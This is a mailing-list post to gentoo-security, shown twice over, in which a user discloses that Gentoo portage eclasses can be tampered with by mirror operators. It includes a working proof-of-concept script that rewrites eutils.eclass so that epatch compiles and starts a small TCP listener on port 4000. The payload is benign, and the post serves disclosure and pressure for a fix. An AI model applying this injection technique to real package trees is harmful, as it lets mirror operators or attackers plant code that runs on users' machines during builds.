Hi,
after 1.5 years (2 years after the bug could could found in bugzilla) it
seems that one of the highest security risks is closed. At least I've
seen something about signed ebuilds. (see
http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ).
Time for the next part. I've already written a bug for that a year ago,
but it was now closed a second time by "the ... gatekeeper".
See bug #26110
Here's the next small script. If you are operating a gentoo mirror, or
having access to one, feel free to play with it.
If you are a user, the only practical way to ensure a minimum of
security is to sync twice:
(a) sync,
(b) delete timestap,
(c) sync with other mirror and
(d) look if no files where different, otherwise restart with (a)
----------------gentooTrojan.sh---------------------------
#!/bin/sh
if [ ${#} -ne 1 ] ; then
echo "This script puts a silly trojan into Gentoo's portage."
echo "Usage: `basename ${0}` PathToPortage"
exit 1
fi
mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass
sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with
telnet localhost 4000.\nKill it with killall
GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:'
<${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass
cat >${1}/eclass/GentooTrojan.c << EOF
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
int main(void)
{
struct sockaddr_in serv;
struct sockaddr_in cli;
int sock;
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock < 0)
return 1;
bzero((char *) &serv, sizeof(serv));
serv.sin_family = AF_INET;
serv.sin_addr.s_addr = htonl(INADDR_ANY);
serv.sin_port = htons(4000);
if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0)
return 1;
if (listen(sock, 5) < 0)
return 1;
while (1) {
int scli;
int slen;
static char *str="Your are listing to the famous Gentoo trojan!\n";
slen = sizeof(cli);
scli = accept(sock, (struct sockaddr *) &cli,
(socklen_t *) &slen);
write(scli, str, strlen(str));
close(scli);
}
}
EOF
gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c
echo "Done. Portage successful infected with a trojan."
echo "Just emerge an ebuild which uses epatch and do a"
echo " telnet localhost 4000"
echo "afterwards."
-------------------------------------------
Kind regards,
Alexander Holler
PS: Please don't reply to me, I don't read any Gentoo mailing lists
anymore, in fact I even don't know why I'm writting this message, as I
already have lost every interest in Gentoo some time ago.
PPS: Sorry for that hard words, but that all reminds me on Microsoft.
The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting
forgotten, ignored or fixed in the same time.
PPPS: I really appreciate all the very good work on hardened gcc,
selinux-profiles and so on, but for me, this all seems useless as long
as the base is compromised that easy and the user has no practical way
(e.g. hashs) to check what he gets on his machine with a 'sync'.
--
gentoo-security@gentoo.org mailing list
after 1.5 years (2 years after the bug could could found in bugzilla) it
seems that one of the highest security risks is closed. At least I've
seen something about signed ebuilds. (see
http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ).
Time for the next part. I've already written a bug for that a year ago,
but it was now closed a second time by "the ... gatekeeper".
See bug #26110
Here's the next small script. If you are operating a gentoo mirror, or
having access to one, feel free to play with it.
If you are a user, the only practical way to ensure a minimum of
security is to sync twice:
(a) sync,
(b) delete timestap,
(c) sync with other mirror and
(d) look if no files where different, otherwise restart with (a)
----------------gentooTrojan.sh---------------------------
#!/bin/sh
if [ ${#} -ne 1 ] ; then
echo "This script puts a silly trojan into Gentoo's portage."
echo "Usage: `basename ${0}` PathToPortage"
exit 1
fi
mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass
sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with
telnet localhost 4000.\nKill it with killall
GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:'
<${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass
cat >${1}/eclass/GentooTrojan.c << EOF
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
int main(void)
{
struct sockaddr_in serv;
struct sockaddr_in cli;
int sock;
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock < 0)
return 1;
bzero((char *) &serv, sizeof(serv));
serv.sin_family = AF_INET;
serv.sin_addr.s_addr = htonl(INADDR_ANY);
serv.sin_port = htons(4000);
if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0)
return 1;
if (listen(sock, 5) < 0)
return 1;
while (1) {
int scli;
int slen;
static char *str="Your are listing to the famous Gentoo trojan!\n";
slen = sizeof(cli);
scli = accept(sock, (struct sockaddr *) &cli,
(socklen_t *) &slen);
write(scli, str, strlen(str));
close(scli);
}
}
EOF
gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c
echo "Done. Portage successful infected with a trojan."
echo "Just emerge an ebuild which uses epatch and do a"
echo " telnet localhost 4000"
echo "afterwards."
-------------------------------------------
Kind regards,
Alexander Holler
PS: Please don't reply to me, I don't read any Gentoo mailing lists
anymore, in fact I even don't know why I'm writting this message, as I
already have lost every interest in Gentoo some time ago.
PPS: Sorry for that hard words, but that all reminds me on Microsoft.
The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting
forgotten, ignored or fixed in the same time.
PPPS: I really appreciate all the very good work on hardened gcc,
selinux-profiles and so on, but for me, this all seems useless as long
as the base is compromised that easy and the user has no practical way
(e.g. hashs) to check what he gets on his machine with a 'sync'.
--
gentoo-security@gentoo.org mailing list